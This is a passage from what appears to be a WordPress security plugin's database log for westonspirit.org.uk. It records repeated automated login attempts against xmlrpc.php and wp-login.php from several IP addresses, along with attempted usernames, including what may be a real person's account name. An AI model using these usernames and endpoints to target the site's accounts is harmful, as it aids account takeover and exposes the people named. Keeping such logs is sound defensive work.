'',0,1629826466.9555,71,'1vuomMsSegqwxhr9plYbOZ8I','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826467.3202,50,'2Yb0ZQvBxcdOjiJRal5CNK6F','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826527.5874,71,'omrGBC1vtEdLP3s468jTANiZ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826527.9628,50,'uH0lYamADfS218JGqVFeiBLM','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826589.0026,71,'hnDWs569FYefNJlERkLicCdt','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826589.3714,50,'jODBoLFrv3JnEgputG48NxRM','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826649.4752,71,'Pz3JXGomsMUt6Ihk2fnVE5a8','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826649.8155,50,'nb2PQ1LHmxqvGi5d3kIKOBgS','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826710.8379,71,'xHmE1ISj80XeBZMGA7v5gDWi','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826711.2015,50,'kT7L4EPrMDjsQn3hKf6UcCWq','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826771.4904,71,'BulSUVPig8Kmzv4WbcGaZqnQ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826771.8313,50,'pjVO1lgf0ikwGXuQcbYCTEIU','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826833.2547,71,'OaA4YfHbVzSh685Mwx1p0nZr','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826833.5880,50,'Vj5aBQZdM3XvCD7yAPqHh40p','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826893.8164,71,'XqrB1yNThRcZVabeifj7E5dC','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826894.1403,50,'pPAaUMQCWsD4Xw837Shr0gOF','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629826956.6695,71,'Ae6FkLvw3Sa7JziMOl9UZItu','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629826957.0005,50,'TYnHrOM26cS358fbDG9olCFE','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827015.4748,71,'7bEPTgMn5Ke9CdH3cOYfisxq','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827015.8000,50,'7eA8ysgNr0mxOCYtEXaif9ld','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827076.8274,71,'ihStdReH1YuXyCbM6l0TfvLQ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827077.1769,50,'P18HZ3I0wk2fpCoS4DtAyiEb','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827137.4715,71,'vHF7WDomYpwuyfVnMa0QP1ZL','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827137.8297,50,'t7TybSYfhc2m1kWXoKIDaE69','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827198.7968,71,'6qigC0Kentlj3OmfudSbzpsT','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827199.1659,50,'3ZmP2sG9ivxeXSwMOI7UY1FH','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827259.5551,71,'0VKdwyM62efTDm5kI7gB4Q1n','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827260.0139,50,'2ewnVIRsN3adyHKJ1uS9XOUZ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827321.0093,71,'vF5tgJBzqSYHUA8wjZaXKEbL','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827321.3585,50,'fgbExdqDcVszNrPUWeByQhMA','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827381.4901,71,'vLj0FyN6ZoWP4EnD2sHgO8bz','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827381.8624,50,'6oHGKIQ3LJ845dzhUlePyC1V','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827442.7076,71,'YonhXFs5zrucxvq39VfRAUNZ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827443.0535,50,'xozl5O2n9D0INrJUHgjvqwWi','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827503.4887,71,'nASb9cR7adPx3TzjmMheuvrY','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827503.8774,50,'d9EMZIWbVumfAz1SU8wFYCpj','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827564.9409,71,'5RQdWCNMDHyht3OquFSrjeap','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827565.3249,50,'LsIEAnWtoUqM89FubzH5xpiZ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827625.4528,71,'hUHK0LGbSAdOnF3lBioR8M9v','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827625.7765,50,'qhmYSNvsaU1GBtXbcldzTF3Z','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'westonspirit',0,1629827687.1125,152,'4bFyilTCRZPaSWEtUnsjmL17','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'westonspirit',0,1629827688.1214,51,'4GrYFq3xp6eP2VMWwhAk7Nsa','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827688.1732,10,'4GrYFq3xp6eP2VMWwhAk7Nsa','','707|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827747.4801,71,'lCMq6jUB54kb7P83w9OpydEJ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827747.8343,50,'DhCbcUT5pl3eWGxYqoOyHgjZ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('107.150.45.58',1805004090,'westonspirit',0,1629827807.5725,51,'A7CPlqMthUm0c6fKV2IS1TaN','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827808.9215,71,'BHsbExQav2ICoN9VjhnzlpWR','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827809.2639,50,'FTCQcDEyeXMHb18qfxRPAOKm','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827869.5229,71,'QinT9e2x3Ok4aEzjIrWMNR6c','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827869.9282,50,'4Qwrjz3BFqM0S762ULZsvNdY','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827930.7591,71,'jc7nZbPr6qBNxVzEQ43UdkCM','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827931.0837,50,'l0omijTMvt4gyQ3L9JbCx7aN','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629827991.5197,71,'4OLYf60HbpgzqSvkVPI3GmUh','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629827991.8590,50,'vPf5b401pS6ChNWDBxFoeXMT','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828053.0052,71,'KArkHbPmJMIca3di0S7QFYjs','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828053.3885,50,'Sw8JA2zCDQlZciotr6g1pkB9','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('142.54.177.3',2385948931,'westonspirit',0,1629828059.2449,51,'L52m0a9pXRNJ4xrtK3VjnYFE','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('63.141.251.236',1066269676,'uk',0,1629828077.7573,51,'G82bDYL6O9ApZH5UwBsmnixu','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828113.4395,71,'3wWCs72JhOxLiDRj0K1rqdb4','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828113.7580,50,'tv31ybCgzD9iK0ROH2XZScho','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828174.7714,71,'b4BD2ywuq7TL0AnWJ19SxGHU','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828175.1252,50,'aSRleEjnsxkGiqcIAMTFhytK','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828235.7386,71,'Fp9KWka6vgjsMlNCBHSGExoJ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828236.0783,50,'K62lILkNbQVFXAHoGEMgC98z','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828296.4945,71,'hibPlIjFQKaoYRtU1eG8scOp','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828296.8337,50,'Xon4yYjtihgSVFRBbHAfc2s8','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828357.5510,71,'sVKYmZwHWDyGt8o0aNqO6fxX','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828357.9058,50,'kT8Go6rYBbf3CIH2JldWNXZU','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828418.5238,71,'uD5Wo98FJaw713rxBfY0zqZv','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828418.8392,50,'KyWoejOx0ML1atPzb4pkD2Hf','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828479.9460,71,'TNfGZXyQg42zSbU5o9IKlxpv','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828480.2779,50,'ZAfRDHhYS62aB15sIVyj3gpr','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828540.5763,71,'uDOhtPABzdQ85YWcoG1FS40a','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828540.9367,50,'M7zJjcsxLta8iV4kAfdIT5K2','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828601.7611,71,'neVyaus5k263UQDg1JYB0di7','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828602.1204,50,'TDIoMaFqWy9RCVhBv60mg1Je','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828662.5175,71,'kf6EAP4CrdXwMjhic1tJu0p5','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828662.8349,50,'m0bv4cOtei3UKsoFlNIuypE9','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828723.7846,71,'RVr1NKS6xyu2MsmzwQj7HEAh','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828724.1377,50,'gRQCjvitTDV1PwWZeNO7pdkr','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828785.6431,71,'vgRHenkcibjSXCwILrQB9TEJ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828786.0375,50,'xWB6King0CsYzTHZ5JceDMjU','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828845.8856,71,'lCYIqwUJfSiD5ctOm1yVQ7ob','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828846.2369,50,'sYQ1wpvoXZEiakzPendVrIBC','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828906.5681,71,'o1DIWtANe9Cfmj20l87uUw6c','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828906.9254,50,'Wuf0siFgtdUq68eEBr5GNLvK','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629828967.8996,71,'45nekG8cqUATSNR9YzbJsOi7','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629828968.2341,50,'rsvtN8bSwK29Y7hWdeBFzpVy','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829028.5886,71,'BrYHstUfi15vgJeNk72L3dCW','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829029.0171,50,'lp8X9gvmAT3ejc1LdzFY2KPV','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829089.6419,71,'h96sPeyTN4cL0t5IaGxY7bqJ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829089.9801,50,'tbv39uBJph8nKiUwoazI7m1N','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829150.6350,71,'ZecLAQih7I1mxCrRJgVMO5qG','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829151.0368,50,'5TjHrGn90qIYg6hpuKdci1OQ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829211.4806,71,'Ek8JNDHcr2SQoOUR9b4VP5ye','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829211.8155,50,'nI5UZQdiHWt12kfVmE9grwbh','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829272.7719,71,'jiNFAo08va7JGumlZ9QwxHdE','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829273.1112,50,'oheKfI48i6LYbZ7NyE5rBu1O','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829333.4756,71,'VQbN5kOGcvaWHMDetmrU7PJd','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829333.8365,50,'IwaS16oBHAl7uWYM0Rt2zGrd','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829394.8907,71,'eWUdqmsaT2BjfLYkAJurzSN1','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829395.2293,50,'lROmhyeSL6jQH5FTgqn02WUM','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829455.5923,71,'FEBHVAXsnDJWbIqvRTQ38Mof','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829455.9947,50,'ENblLZ0Q3nRm65X4Pq8FBTw7','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829516.8049,71,'NSpjyIbhZ8o1gXxme96AJdW3','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829517.1823,50,'ZNjixRfdyM4FLucOkU3YQqoC','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829577.6097,71,'jLqpkydAob2aPIfeNYl4wEMU','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829577.9635,50,'ro78xf2VzH4AC3ehSmqb1dLN','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829638.7790,71,'DKMVeTEPQBGUvLxpn2415Csg','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829639.1293,50,'QlEB1WImrGUXM36ef2oH8Nh9','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('208.97.188.209',3496066257,'admin',0,1629829688.4595,152,'QxSq6OhGYwjskmuE2o5ldPeD','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829699.7839,71,'vlCph48T59F2zwVM17AaKXnS','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829700.3791,50,'ehdL2GQs1EDj4wYyWOpbUrvM','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829760.8673,71,'N8yTipHvuXbI9YDq5sGM0CAt','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829761.2569,50,'nWMNpIgyU7B9aRd8lsoFHuD4','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829821.6004,71,'isbE891HNy7SQ6IKzrd3xnpZ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829821.9740,50,'hJeATMyIW7uxCtras8YovjFd','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('157.230.164.216',2649138392,'admin',0,1629829872.0309,152,'DSzFrho4wGxmIeknM8i1YuKf','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829882.9352,71,'pUkLW2nQTPvSJ6VfiHBybzAZ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829883.2953,50,'96IjsfCySpna7i1mO03TeuUN','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629829943.5586,71,'FmbusaZtUDiHpVk9xRB5JP0M','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629829943.9027,50,'MAXaDxq6Y0Zt2B8lmhEpIuCj','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830005.0603,71,'m0kinVdW3TUG76bfeHrRjhDC','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830005.4045,50,'r3RpJ7zBEHCF0sNtKoafPUjb','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830065.5089,71,'m5CXEqNrM7fhsxg3OnDjHi1Y','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830065.9422,50,'VNKxAfeLmko95TzZEJytdBcG','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('45.93.168.195',761112771,'admin',0,1629830088.5309,152,'0E9AgMojU2xfyrS6kwYuGFOB','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830126.8071,71,'YavjpBztMQwyLWJSsd9438i6','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830127.1341,50,'auM67ypO9cLRNqiHTDCzI8bP','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830187.9675,71,'APryc95aQDUnF2GjTuYb134f','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830188.2842,50,'SHj9dGn531DJAPVtzOrkQTvB','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830248.7722,71,'lyB7mIxiv20EMDWCkFZYtz4H','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830249.1187,50,'EZsJ0MWc8iuXPeR45wHpFhbV','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830309.8915,71,'Jsdfak4LiHyzp93vjrem1XM8','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830310.2643,50,'zDQrMiqZBdlI6g340uPNHKOF','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('119.18.52.177',1997681841,'admin',0,1629830322.3106,152,'FIp7Wvjqi1w0xnVCPR2dHyKS','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830370.9366,71,'DHELnZoc9gwk3TKbpl4mX5yU','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830371.2858,50,'qoSjFTOgt8w0e45d3WDbEncJ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830431.5867,71,'a7uvgRpEnD4XjG1to6QCNsLW','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830431.9959,50,'i3HO2jRu15s9DngwKV4pIXMx','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830492.9476,71,'Fb68fCBYrQeoc7OGXPUsWRwV','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830493.3068,50,'JHh8cO7lExyMePDKpuwgYtiN','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('161.35.161.13',2703466765,'admin',0,1629830532.7922,152,'sWoM9r2cZUV5aHDBj6E8QNnm','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830553.5323,71,'EP91idcpWLKrXhf7VOGoawSg','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830553.8620,50,'Ls1RfIYyMS6rBdkUKmnF8NQH','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830615.0044,71,'aV6LbR2v8wKEFsQA9GtkBoy3','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830615.3572,50,'z9gvLKWuXVHjmRUOeo5wFDdn','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830675.5977,71,'jQOYfxFMZX8PwoUgT5dyapKv','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830675.9422,50,'DSsZ1n0waGVxF3kObWMj9KLq','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830737.7146,71,'THbeQyGKF5nPwWzaVq3tBfXi','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830738.6369,50,'N3xeqFo2ZVTWcMBAOj0pL68i','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('162.241.102.138',2733729418,'admin',0,1629830782.7406,152,'bmhx3CTnfQNcP7OAyERvdeiG','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830797.5490,71,'BXFqWhf6zMieIdTOSYwctbG0','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830797.8967,50,'LJhroq6YNmA9EIbzdR2kGxFc','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830859.0566,71,'dAwFJICO6vYDmQhypjot3S2l','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830859.0800,71,'CY3xJHeG7SWnwRfyEub64rZi','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830859.4079,50,'P2rko0BavIEmJnCZDcjygFQq','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830859.4484,50,'4OEPK0SvCLNIGwF8pTUaJjWD','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830919.5278,71,'AX3wuZCsEgQ7rBWvnKfq6pdk','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830919.8873,50,'Gfx8EuM6QWSrzTAJa4Fwl7Hp','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629830980.7518,71,'fl4DrE8XBFhdGORnscuKg1io','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629830981.0908,50,'gnAs4mFa9JZ8olzEfpGHyRY7','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('34.146.142.71',580030023,'admin',0,1629830999.5988,152,'jDrPeETw8NcKg2hL9sp3zRiS','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831041.5338,71,'1jC0uyKME73V6kotlcwPGTsf','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831041.8508,50,'C8EVt5xB1dYXDbO0SKwv6MIy','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629831103.0432,71,'euiAfVHFrsGaYcDZz6Pygo7L','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831103.4835,50,'j78OfNSVBM3Ai4zcZX1gKR2p','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629831163.5703,71,'dm2VfyMza80kxCKQ694UhwH1','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831163.9058,50,'6JbhVuCsAiqMegjPkLzEGYoR','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629831224.8446,71,'Bv01HoW2jNkGpXqJgd93ZRMt','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831225.1656,50,'P5fkQHZlKB2j7S0YMzO6p3ty','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('159.253.43.8',2684168968,'admin',0,1629831265.8177,152,'Jr7zaSdbHcByN2Zq908niYXf','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831285.5897,71,'rYxBbR9GTs7ht3uSKpP56ljZ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831285.9301,50,'RZDBsjroJxclFqNSdV1wE23e','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'admin',0,1629831346.6484,152,'rUzc3FQd1KS48Asuk2aXfghD','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'admin',0,1629831347.8369,7,'Iahc5B7gMOufLKA8ikpJwFWG','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('121.101.133.202',2036696522,'louise.buckley',0,1629831350.7548,152,'j2XzQCtbDklg03UViAL4SqH8','','0|0|0|0|www.westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'admin',0,1629831408.1410,152,'h9gxHvM0i1ksJBd8cyE7CFWf','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'admin',0,1629831409.1383,7,'lBd5R0IhgmEb3eFJVqs1Ou8a','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'admin',0,1629831469.1402,152,'vyh5oAGNn1VBbPOE8cC2t9aX','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831469.1621,10,'vyh5oAGNn1VBbPOE8cC2t9aX','','701|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831470.1768,50,'3BXPdYHNWpFoQ4vLg5TIqOr2','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629831529.8456,71,'eXVnmZ3TFj0l4dzQWqDAgBP